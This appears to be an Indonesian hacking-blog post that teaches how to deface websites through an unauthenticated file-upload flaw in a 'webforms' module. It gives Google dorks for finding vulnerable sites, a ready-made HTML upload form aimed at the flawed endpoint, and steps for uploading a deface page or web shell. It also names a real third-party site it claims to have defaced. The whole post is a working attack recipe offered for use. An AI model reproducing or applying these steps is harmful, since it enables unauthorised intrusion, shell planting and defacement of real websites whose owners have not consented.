Quotes By Mr.Acid Poison |
Dork :
- inurl:/webforms/index/index intext:2016CSRF :
- inurl:/webforms/index/index/ intext:beauty intitle:shop
<form method="POST" action="https://site/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>
Web Vuln ditandai dengan "[]"
*Tanpa tanda petik
Eksploit :
site.com/path//js/webforms/upload/index.phpLangkah-langkah :
- Seperti biasa kita cari web dengan memasukan dork kebrowser
- Lalu kita masukan eksploitnya
- Lalu kita masukan site tersebut ke CSRF
- Kemudian kita buka csrf tersebut
- Lalu upload sc deface/shell kita
- Tinggal buka deh akses nya
site.com/js/webforms/upload/files/[angka random]/namafile.htmlHasil pnya w
https://www.w6-naehmaschinen.de/js/webforms/upload/files/mqe5e/team.htmlSekian dan terimakasih sampai jumpa di artikel selanjutnya ya :*
Mr.Acid Poison
Thanks to
- All member Cyrus Cyber
- Cowokerensteam (inspirasi artikel ini)
comment 0 comments:
more_vert*Komentar Dengan Sopan !
*Jangan OOT ^_^
sentiment_satisfied Emoticon